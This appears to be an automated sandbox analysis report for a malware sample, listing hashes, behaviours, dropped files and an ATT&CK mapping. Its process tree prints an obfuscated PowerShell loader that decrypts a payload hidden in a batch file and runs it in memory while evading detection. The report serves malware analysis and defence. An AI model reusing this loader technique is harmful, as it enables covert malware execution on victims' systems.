f8a021222ad2ca32a7b3562f643d95401efca4ccd44c814f6107a0c828bee235

General

Target

file.exe
Size

508KB
MD5

3d8e55da456380fb8a608f177bfa32f4
SHA1

099ae11a503b6aa026ccce9960327ce162511c4f
SHA256

f8a021222ad2ca32a7b3562f643d95401efca4ccd44c814f6107a0c828bee235
SHA512

7baba73e810c20b9b44a123504da97d47a8ae65f477bd610efa2d9dca88682ebc5dc62ee61b2106f83cef09c1a2f77c7ad6d35cb99b34002ebe51e9962d2f638
SSDEEP

6144:lgZiAEAO0sByNsAal3gVAWgS7/OhwjKz1Jo7KBGHjaMI6zPQE:lgZXEAO/BUdG3gVdt7Kjz1JPkDaMbN

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
1860	Services64.bat.exe

Loads dropped DLL 1 IoCs

pid	Process
696	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1860	Services64.bat.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1860	Services64.bat.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1716 wrote to memory of 696	1716	file.exe	28
PID 1716 wrote to memory of 696	1716	file.exe	28
PID 1716 wrote to memory of 696	1716	file.exe	28
PID 1716 wrote to memory of 696	1716	file.exe	28
PID 696 wrote to memory of 1860	696	cmd.exe	30
PID 696 wrote to memory of 1860	696	cmd.exe	30
PID 696 wrote to memory of 1860	696	cmd.exe	30
PID 696 wrote to memory of 1860	696	cmd.exe	30

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1716
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat" "
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:696
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat.exe
    "Services64.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_XoNYx = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat').Split([Environment]::NewLine);foreach ($_CASH_JmiKu in $_CASH_XoNYx) { if ($_CASH_JmiKu.StartsWith(':: @')) { $_CASH_pEcwm = $_CASH_JmiKu.Substring(4); break; }; };$_CASH_pEcwm = [System.Text.RegularExpressions.Regex]::Replace($_CASH_pEcwm, '_CASH_', '');$_CASH_hcrkM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_pEcwm);$_CASH_NmnGY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V674PRScmmHDDJLWVhq6egNrAg2NiglLrOeQ3AuEMAI=');for ($i = 0; $i -le $_CASH_hcrkM.Length - 1; $i++) { $_CASH_hcrkM[$i] = ($_CASH_hcrkM[$i] -bxor $_CASH_NmnGY[$i % $_CASH_NmnGY.Length]); };$_CASH_CmTge = New-Object System.IO.MemoryStream(, $_CASH_hcrkM);$_CASH_hXKYV = New-Object System.IO.MemoryStream;$_CASH_yZXbk = New-Object System.IO.Compression.GZipStream($_CASH_CmTge, [IO.Compression.CompressionMode]::Decompress);$_CASH_yZXbk.CopyTo($_CASH_hXKYV);$_CASH_yZXbk.Dispose();$_CASH_CmTge.Dispose();$_CASH_hXKYV.Dispose();$_CASH_hcrkM = $_CASH_hXKYV.ToArray();$_CASH_pEfZi = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_hcrkM);$_CASH_Auehj = $_CASH_pEfZi.EntryPoint;$_CASH_Auehj.Invoke($null, (, [string[]] ('')))
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1860

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat

Filesize
238KB

MD5
b9ca345ef71ae3911e20797eb0aa672d

SHA1
603101eb7fd4c628d71d710f92c70caed976a9f4

SHA256
ade666928768de996b1fc03f1bf0ac8dde70809c5f3ab70f7c1b69ad0a92678b

SHA512
c3e17faa7f7ff67766010573b73bcb93e623371e7d8fda5cc75ed84265f6ab31c5959053fc0117125a5bf4730691c8cb880165116e6f46bda3d6ace922533b4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat

Filesize
238KB

MD5
b9ca345ef71ae3911e20797eb0aa672d

SHA1
603101eb7fd4c628d71d710f92c70caed976a9f4

SHA256
ade666928768de996b1fc03f1bf0ac8dde70809c5f3ab70f7c1b69ad0a92678b

SHA512
c3e17faa7f7ff67766010573b73bcb93e623371e7d8fda5cc75ed84265f6ab31c5959053fc0117125a5bf4730691c8cb880165116e6f46bda3d6ace922533b4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
memory/1860-76-0x00000000001B0000-0x00000000001F0000-memory.dmp

Filesize
256KB

Download
memory/1860-77-0x00000000001B0000-0x00000000001F0000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing